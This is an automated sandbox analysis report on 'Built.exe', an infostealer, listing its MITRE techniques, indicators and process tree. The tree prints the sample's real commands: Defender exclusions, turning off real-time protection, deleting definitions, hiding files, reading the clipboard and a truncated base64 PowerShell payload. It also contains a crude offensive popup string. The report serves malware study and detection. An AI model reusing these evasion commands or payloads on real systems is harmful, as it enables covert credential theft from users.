c389ab210f64f5d85755f64418964169b3b9548a8c422a86b84ea0ac038a2ca7

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
02/02/2025, 20:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

100.0MB
MD5

1634e4d7f8c805ec3ac2b303c0787447
SHA1

de0031098666fb929c19cf8b88f727749d54b8be
SHA256

c389ab210f64f5d85755f64418964169b3b9548a8c422a86b84ea0ac038a2ca7
SHA512

a83f9722eac13abce3462d1c6ecb9e3b222131acd671aa9507ae55f490f10875bef5472ecb0a10881c9d6acfb89927a69cc7a883547352a7b4205c67855d2540
SSDEEP

98304:ge3zHqdVfB2FS2/mIyuT/9vUIdD9C+z3zO917vOTh+ezDNh7n8mJ1nmOBr9n4m9D:goQsIIbT/9bvLz3S1bA3zpn9VDhhb

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1368	powershell.exe
436	powershell.exe
1336	powershell.exe
4012	powershell.exe
2280	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3844	cmd.exe
760	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4416	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe
2332	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
23	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4680	tasklist.exe
2044	tasklist.exe
1436	tasklist.exe
3824	tasklist.exe
3972	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3600	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0009000000023ba3-21.dat	upx
behavioral2/memory/2332-25-0x00007FFC28FA0000-0x00007FFC29589000-memory.dmp	upx
behavioral2/files/0x000a000000023b7d-27.dat	upx
behavioral2/memory/2332-29-0x00007FFC3C800000-0x00007FFC3C823000-memory.dmp	upx
behavioral2/files/0x000e000000023b95-30.dat	upx
behavioral2/memory/2332-32-0x00007FFC40890000-0x00007FFC4089F000-memory.dmp	upx
behavioral2/files/0x000a000000023b8e-34.dat	upx
behavioral2/files/0x0008000000023b9e-35.dat	upx
behavioral2/files/0x000e000000023ba9-38.dat	upx
behavioral2/files/0x0008000000023bae-40.dat	upx
behavioral2/files/0x0008000000023bab-39.dat	upx
behavioral2/files/0x000a000000023b7c-41.dat	upx
behavioral2/files/0x000a000000023b7e-42.dat	upx
behavioral2/files/0x000b000000023b84-48.dat	upx
behavioral2/files/0x000a000000023b83-47.dat	upx
behavioral2/files/0x000a000000023b82-46.dat	upx
behavioral2/files/0x000a000000023b81-45.dat	upx
behavioral2/files/0x000a000000023b80-44.dat	upx
behavioral2/files/0x000a000000023b7f-43.dat	upx
behavioral2/memory/2332-54-0x00007FFC3C0A0000-0x00007FFC3C0CD000-memory.dmp	upx
behavioral2/memory/2332-56-0x00007FFC3E430000-0x00007FFC3E449000-memory.dmp	upx
behavioral2/memory/2332-58-0x00007FFC38390000-0x00007FFC383B3000-memory.dmp	upx
behavioral2/memory/2332-60-0x00007FFC28AF0000-0x00007FFC28C67000-memory.dmp	upx
behavioral2/memory/2332-62-0x00007FFC3CE10000-0x00007FFC3CE29000-memory.dmp	upx
behavioral2/memory/2332-64-0x00007FFC3CBA0000-0x00007FFC3CBAD000-memory.dmp	upx
behavioral2/memory/2332-66-0x00007FFC38360000-0x00007FFC3838E000-memory.dmp	upx
behavioral2/memory/2332-74-0x00007FFC3C800000-0x00007FFC3C823000-memory.dmp	upx
behavioral2/memory/2332-73-0x00007FFC286B0000-0x00007FFC28A28000-memory.dmp	upx
behavioral2/memory/2332-71-0x00007FFC28A30000-0x00007FFC28AE8000-memory.dmp	upx
behavioral2/memory/2332-70-0x00007FFC28FA0000-0x00007FFC29589000-memory.dmp	upx
behavioral2/memory/2332-83-0x00007FFC28590000-0x00007FFC286AC000-memory.dmp	upx
behavioral2/memory/2332-82-0x00007FFC3E430000-0x00007FFC3E449000-memory.dmp	upx
behavioral2/memory/2332-80-0x00007FFC3CA40000-0x00007FFC3CA4D000-memory.dmp	upx
behavioral2/memory/2332-79-0x00007FFC3C0A0000-0x00007FFC3C0CD000-memory.dmp	upx
behavioral2/memory/2332-77-0x00007FFC3C7A0000-0x00007FFC3C7B4000-memory.dmp	upx
behavioral2/memory/2332-76-0x00007FFC40890000-0x00007FFC4089F000-memory.dmp	upx
behavioral2/memory/2332-109-0x00007FFC38390000-0x00007FFC383B3000-memory.dmp	upx
behavioral2/memory/2332-122-0x00007FFC28AF0000-0x00007FFC28C67000-memory.dmp	upx
behavioral2/memory/2332-124-0x00007FFC3CE10000-0x00007FFC3CE29000-memory.dmp	upx
behavioral2/memory/2332-169-0x00007FFC3CBA0000-0x00007FFC3CBAD000-memory.dmp	upx
behavioral2/memory/2332-227-0x00007FFC38360000-0x00007FFC3838E000-memory.dmp	upx
behavioral2/memory/2332-251-0x00007FFC28A30000-0x00007FFC28AE8000-memory.dmp	upx
behavioral2/memory/2332-256-0x00007FFC286B0000-0x00007FFC28A28000-memory.dmp	upx
behavioral2/memory/2332-270-0x00007FFC3C7A0000-0x00007FFC3C7B4000-memory.dmp	upx
behavioral2/memory/2332-277-0x00007FFC28AF0000-0x00007FFC28C67000-memory.dmp	upx
behavioral2/memory/2332-272-0x00007FFC3C800000-0x00007FFC3C823000-memory.dmp	upx
behavioral2/memory/2332-271-0x00007FFC28FA0000-0x00007FFC29589000-memory.dmp	upx
behavioral2/memory/2332-285-0x00007FFC28590000-0x00007FFC286AC000-memory.dmp	upx
behavioral2/memory/2332-306-0x00007FFC28FA0000-0x00007FFC29589000-memory.dmp	upx
behavioral2/memory/2332-321-0x00007FFC28FA0000-0x00007FFC29589000-memory.dmp	upx
behavioral2/memory/2332-341-0x00007FFC38390000-0x00007FFC383B3000-memory.dmp	upx
behavioral2/memory/2332-346-0x00007FFC28A30000-0x00007FFC28AE8000-memory.dmp	upx
behavioral2/memory/2332-345-0x00007FFC38360000-0x00007FFC3838E000-memory.dmp	upx
behavioral2/memory/2332-344-0x00007FFC3CBA0000-0x00007FFC3CBAD000-memory.dmp	upx
behavioral2/memory/2332-343-0x00007FFC3CE10000-0x00007FFC3CE29000-memory.dmp	upx
behavioral2/memory/2332-342-0x00007FFC28AF0000-0x00007FFC28C67000-memory.dmp	upx
behavioral2/memory/2332-340-0x00007FFC3E430000-0x00007FFC3E449000-memory.dmp	upx
behavioral2/memory/2332-339-0x00007FFC3C0A0000-0x00007FFC3C0CD000-memory.dmp	upx
behavioral2/memory/2332-338-0x00007FFC40890000-0x00007FFC4089F000-memory.dmp	upx
behavioral2/memory/2332-337-0x00007FFC3C800000-0x00007FFC3C823000-memory.dmp	upx
behavioral2/memory/2332-335-0x00007FFC28590000-0x00007FFC286AC000-memory.dmp	upx
behavioral2/memory/2332-334-0x00007FFC3CA40000-0x00007FFC3CA4D000-memory.dmp	upx
behavioral2/memory/2332-333-0x00007FFC3C7A0000-0x00007FFC3C7B4000-memory.dmp	upx
behavioral2/memory/2332-336-0x00007FFC286B0000-0x00007FFC28A28000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3892	PING.EXE
1532	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4944	cmd.exe
3500	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1832	WMIC.exe
3084	WMIC.exe
3972	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3264	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3892	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4012	powershell.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe
4012	powershell.exe
4012	powershell.exe
2280	powershell.exe
2280	powershell.exe
760	powershell.exe
760	powershell.exe
760	powershell.exe
1416	powershell.exe
1416	powershell.exe
1416	powershell.exe
1336	powershell.exe
1336	powershell.exe
1020	powershell.exe
1020	powershell.exe
1368	powershell.exe
1368	powershell.exe
4512	powershell.exe
4512	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2044	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1176	WMIC.exe
Token: SeSecurityPrivilege	1176	WMIC.exe
Token: SeTakeOwnershipPrivilege	1176	WMIC.exe
Token: SeLoadDriverPrivilege	1176	WMIC.exe
Token: SeSystemProfilePrivilege	1176	WMIC.exe
Token: SeSystemtimePrivilege	1176	WMIC.exe
Token: SeProfSingleProcessPrivilege	1176	WMIC.exe
Token: SeIncBasePriorityPrivilege	1176	WMIC.exe
Token: SeCreatePagefilePrivilege	1176	WMIC.exe
Token: SeBackupPrivilege	1176	WMIC.exe
Token: SeRestorePrivilege	1176	WMIC.exe
Token: SeShutdownPrivilege	1176	WMIC.exe
Token: SeDebugPrivilege	1176	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1176	WMIC.exe
Token: SeRemoteShutdownPrivilege	1176	WMIC.exe
Token: SeUndockPrivilege	1176	WMIC.exe
Token: SeManageVolumePrivilege	1176	WMIC.exe
Token: 33	1176	WMIC.exe
Token: 34	1176	WMIC.exe
Token: 35	1176	WMIC.exe
Token: 36	1176	WMIC.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeIncreaseQuotaPrivilege	1176	WMIC.exe
Token: SeSecurityPrivilege	1176	WMIC.exe
Token: SeTakeOwnershipPrivilege	1176	WMIC.exe
Token: SeLoadDriverPrivilege	1176	WMIC.exe
Token: SeSystemProfilePrivilege	1176	WMIC.exe
Token: SeSystemtimePrivilege	1176	WMIC.exe
Token: SeProfSingleProcessPrivilege	1176	WMIC.exe
Token: SeIncBasePriorityPrivilege	1176	WMIC.exe
Token: SeCreatePagefilePrivilege	1176	WMIC.exe
Token: SeBackupPrivilege	1176	WMIC.exe
Token: SeRestorePrivilege	1176	WMIC.exe
Token: SeShutdownPrivilege	1176	WMIC.exe
Token: SeDebugPrivilege	1176	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1176	WMIC.exe
Token: SeRemoteShutdownPrivilege	1176	WMIC.exe
Token: SeUndockPrivilege	1176	WMIC.exe
Token: SeManageVolumePrivilege	1176	WMIC.exe
Token: 33	1176	WMIC.exe
Token: 34	1176	WMIC.exe
Token: 35	1176	WMIC.exe
Token: 36	1176	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1832	WMIC.exe
Token: SeSecurityPrivilege	1832	WMIC.exe
Token: SeTakeOwnershipPrivilege	1832	WMIC.exe
Token: SeLoadDriverPrivilege	1832	WMIC.exe
Token: SeSystemProfilePrivilege	1832	WMIC.exe
Token: SeSystemtimePrivilege	1832	WMIC.exe
Token: SeProfSingleProcessPrivilege	1832	WMIC.exe
Token: SeIncBasePriorityPrivilege	1832	WMIC.exe
Token: SeCreatePagefilePrivilege	1832	WMIC.exe
Token: SeBackupPrivilege	1832	WMIC.exe
Token: SeRestorePrivilege	1832	WMIC.exe
Token: SeShutdownPrivilege	1832	WMIC.exe
Token: SeDebugPrivilege	1832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1832	WMIC.exe
Token: SeRemoteShutdownPrivilege	1832	WMIC.exe
Token: SeUndockPrivilege	1832	WMIC.exe
Token: SeManageVolumePrivilege	1832	WMIC.exe
Token: 33	1832	WMIC.exe
Token: 34	1832	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2332	2108	Built.exe	86
PID 2108 wrote to memory of 2332	2108	Built.exe	86
PID 2332 wrote to memory of 1120	2332	Built.exe	87
PID 2332 wrote to memory of 1120	2332	Built.exe	87
PID 2332 wrote to memory of 3428	2332	Built.exe	88
PID 2332 wrote to memory of 3428	2332	Built.exe	88
PID 2332 wrote to memory of 4416	2332	Built.exe	89
PID 2332 wrote to memory of 4416	2332	Built.exe	89
PID 2332 wrote to memory of 2504	2332	Built.exe	91
PID 2332 wrote to memory of 2504	2332	Built.exe	91
PID 2332 wrote to memory of 4864	2332	Built.exe	95
PID 2332 wrote to memory of 4864	2332	Built.exe	95
PID 1120 wrote to memory of 4012	1120	cmd.exe	97
PID 1120 wrote to memory of 4012	1120	cmd.exe	97
PID 2504 wrote to memory of 2044	2504	cmd.exe	98
PID 2504 wrote to memory of 2044	2504	cmd.exe	98
PID 4864 wrote to memory of 1176	4864	cmd.exe	99
PID 4864 wrote to memory of 1176	4864	cmd.exe	99
PID 4416 wrote to memory of 4380	4416	cmd.exe	100
PID 4416 wrote to memory of 4380	4416	cmd.exe	100
PID 3428 wrote to memory of 436	3428	cmd.exe	101
PID 3428 wrote to memory of 436	3428	cmd.exe	101
PID 2332 wrote to memory of 3676	2332	Built.exe	103
PID 2332 wrote to memory of 3676	2332	Built.exe	103
PID 3676 wrote to memory of 4440	3676	cmd.exe	105
PID 3676 wrote to memory of 4440	3676	cmd.exe	105
PID 2332 wrote to memory of 3984	2332	Built.exe	106
PID 2332 wrote to memory of 3984	2332	Built.exe	106
PID 3984 wrote to memory of 1972	3984	cmd.exe	108
PID 3984 wrote to memory of 1972	3984	cmd.exe	108
PID 2332 wrote to memory of 1416	2332	Built.exe	149
PID 2332 wrote to memory of 1416	2332	Built.exe	149
PID 1416 wrote to memory of 1832	1416	cmd.exe	111
PID 1416 wrote to memory of 1832	1416	cmd.exe	111
PID 2332 wrote to memory of 4348	2332	Built.exe	112
PID 2332 wrote to memory of 4348	2332	Built.exe	112
PID 4348 wrote to memory of 3084	4348	cmd.exe	114
PID 4348 wrote to memory of 3084	4348	cmd.exe	114
PID 2332 wrote to memory of 3600	2332	Built.exe	177
PID 2332 wrote to memory of 3600	2332	Built.exe	177
PID 2332 wrote to memory of 4448	2332	Built.exe	117
PID 2332 wrote to memory of 4448	2332	Built.exe	117
PID 3600 wrote to memory of 2700	3600	cmd.exe	119
PID 3600 wrote to memory of 2700	3600	cmd.exe	119
PID 4448 wrote to memory of 2280	4448	cmd.exe	120
PID 4448 wrote to memory of 2280	4448	cmd.exe	120
PID 2332 wrote to memory of 3016	2332	Built.exe	121
PID 2332 wrote to memory of 3016	2332	Built.exe	121
PID 2332 wrote to memory of 1772	2332	Built.exe	122
PID 2332 wrote to memory of 1772	2332	Built.exe	122
PID 1772 wrote to memory of 3824	1772	cmd.exe	125
PID 1772 wrote to memory of 3824	1772	cmd.exe	125
PID 3016 wrote to memory of 1436	3016	cmd.exe	126
PID 3016 wrote to memory of 1436	3016	cmd.exe	126
PID 2332 wrote to memory of 2896	2332	Built.exe	127
PID 2332 wrote to memory of 2896	2332	Built.exe	127
PID 2332 wrote to memory of 3844	2332	Built.exe	129
PID 2332 wrote to memory of 3844	2332	Built.exe	129
PID 2332 wrote to memory of 4424	2332	Built.exe	131
PID 2332 wrote to memory of 4424	2332	Built.exe	131
PID 2896 wrote to memory of 4952	2896	cmd.exe	133
PID 2896 wrote to memory of 4952	2896	cmd.exe	133
PID 3844 wrote to memory of 760	3844	cmd.exe	134
PID 3844 wrote to memory of 760	3844	cmd.exe	134

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4564	attrib.exe
2700	attrib.exe
3572	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('smd... :3', 0, 'i like kids ', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4416
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('smd... :3', 0, 'i like kids ', 0+16);close()"
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4424
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4560
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4944
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1612
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2732
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcw